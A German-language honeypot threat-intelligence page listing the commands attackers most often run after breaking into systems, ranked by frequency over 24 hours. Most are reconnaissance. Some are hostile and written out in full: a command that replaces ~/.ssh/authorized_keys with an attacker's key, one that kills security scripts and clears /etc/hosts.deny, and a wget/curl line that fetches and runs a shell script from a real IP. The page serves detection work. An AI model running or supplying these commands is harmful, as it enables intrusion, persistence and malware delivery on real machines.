Ausgefuhrte Befehle

Echtzeit-Analyse der am haufigsten von Angreifern ausgefuhrten Befehle nach Erlangung des Systemzugangs. Daten aus unserem globalen Honeypot-Netzwerk der letzten 24 Stunden.

8752 Befehle in 24h

Top Ausgefuhrte Befehle

$Enter new UNIX password:

240 IPs582x

$uname -s -v -n -m 2 > /dev/null

162 IPs562x

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version

154 IPs514x

$lockr -ia .ssh

296 IPs394x

$cd ~; chattr -ia .ssh; lockr -ia .ssh

258 IPs331x

$uname -a

252 IPs322x

$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

258 IPs321x

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

254 IPs319x

$cat /proc/uptime 2 > /dev/null | cut -d. -f1

61 IPs318x

10.

$cat /proc/cpuinfo | grep name | wc -l

256 IPs318x

11.

$uname

247 IPs314x

12.

$uname -m

242 IPs314x

13.

$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

244 IPs312x

14.

$whoami

246 IPs311x

15.

$w

246 IPs309x

16.

$crontab -l

241 IPs308x

17.

$lscpu | grep Model

240 IPs304x

18.

$top

242 IPs303x

19.

$cat /proc/cpuinfo | grep model | grep name | wc -l

239 IPs302x

20.

$which ls

238 IPs292x

21.

$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

234 IPs287x

22.

$ls -lh $(which ls)

228 IPs275x

23.

$uname -m 2 > /dev/null

59 IPs168x

24.

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

64 IPs66x

25.

$/bin/./uname -s -v -n -r -m

16 IPs45x

26.

$uname -s -v -n -r -m

12 IPs27x

27.

cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android

4 IPs17x

28.

$then

6 IPs16x

29.

$if [ [ ! -d ${HOME}/.ssh ] ]

6 IPs16x

30.

$nproc

6 IPs14x

Aufklarung

Befehle zum Sammeln von Systeminformationen (uname, whoami, cat /etc/passwd)

Download

Befehle zum Herunterladen von Malware (wget, curl, tftp)

Persistenz

Befehle zur Aufrechterhaltung des Zugangs (crontab, chmod, chattr)

Laterale Bewegung

Befehle zur Ausbreitung im Netzwerk (ssh, scp, ping)

Uber diese Daten

Diese Befehle werden in Echtzeit erfasst, wenn Angreifer Zugang zu unseren Honeypots erhalten. Sie reprasentieren tatsachliche Techniken, die in automatisierten und manuellen Angriffen verwendet werden. Nutzen Sie diese Informationen, um Ihre Bedrohungserkennung und Vorfallreaktion zu verbessern.